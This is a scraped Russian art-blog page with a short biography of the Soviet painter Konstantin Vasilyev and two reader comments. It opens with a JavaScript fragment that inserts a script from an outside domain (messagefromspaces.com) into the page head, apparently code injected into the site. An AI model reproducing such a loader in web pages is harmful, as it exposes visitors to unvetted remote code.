, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Константин Васильев

Автор: Юлия | 05 Мар 2011

Константин Васильев (1942-1976) – советский художник, автор картин фольклорно-исторического жанра. Родился в Майкопе, но большую часть своей жизни провел в поселке Васильево под Казанью, куда семья Васильевых переехала после войны. Уже в детстве маленький Костя проявил удивительные способности к рисованию. Познакомившись с творчеством Васнецова, мальчик с помощью цветных карандашей очень удачно скопировал его "Богатырей" и "Витязя на распутье". Но чаще всего юный художник обращался к окружающей природе: его первые работы были, в основном, пейзажами.

Обучаться изобразительному искусству Константин Васильев начал в Московской средней художественной школе при институте имени В. И. Сурикова, куда, по воле случая, устроили его родители. Но после смерти отца ему пришлось вернуться в Казань, где Васильев окончил Казанское художественное училище (1957-1961). Он с блеском защитил дипломную работу, представлявшую эскизы декораций к опере Римского-Корсакова "Снегурочка".

Творческие искания поначалу привели Васильева к сюрреализму и абстракционизму, но вскоре он вновь вернулся к реализму. Славянский и скандинавский эпос, мифы, сказания, былины – все это вдохновляло художника на создание ярких, самобытных образов в своих картинах. Среди самых известных его работ, посвященных данной тематике: "Человек с филином", "Валькирия", "Витязь", "Вотан", "Великан", "Поединок Пересвета с Челубеем", "Плач Ярославны", "Старец".

Константин Васильев так же обращался к военной тематике (картины "Маршал Жуков", "Над Берлином", "Прощание славянки", "Нашествие"), создавал удивительные по красоте пейзажи ("Берег", "Отечество", "Лесная готика"). За свою недолгую жизнь художник оставил богатое творческое наследие, которое насчитывает более 400 произведений живописи и графики.


Темы: Вдохновение, Галерея картин художников, Изобразительное искусство | Отзывов: 2 »

Отзывов: 2 на “Константин Васильев”

  1. Максим пишет:
    05 Июл 2011 в 08:59

    Картины просто БОМБА!
    Это насколько же было развито сознание человека, чтоб создавать такое. Я бы наверное и за всю жизнь обучения не смог бы повторить и десятой части мастерства

  2. Дмитрий Алмазов пишет:
    05 Июл 2011 в 11:03

    Чтобы так рисовать Максим надо не только долго учиться, но и иметь к этому призвание. И как Константин Васильев посвятить этому всю жизнь. Тогда и у Вас так получится рисовать!

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress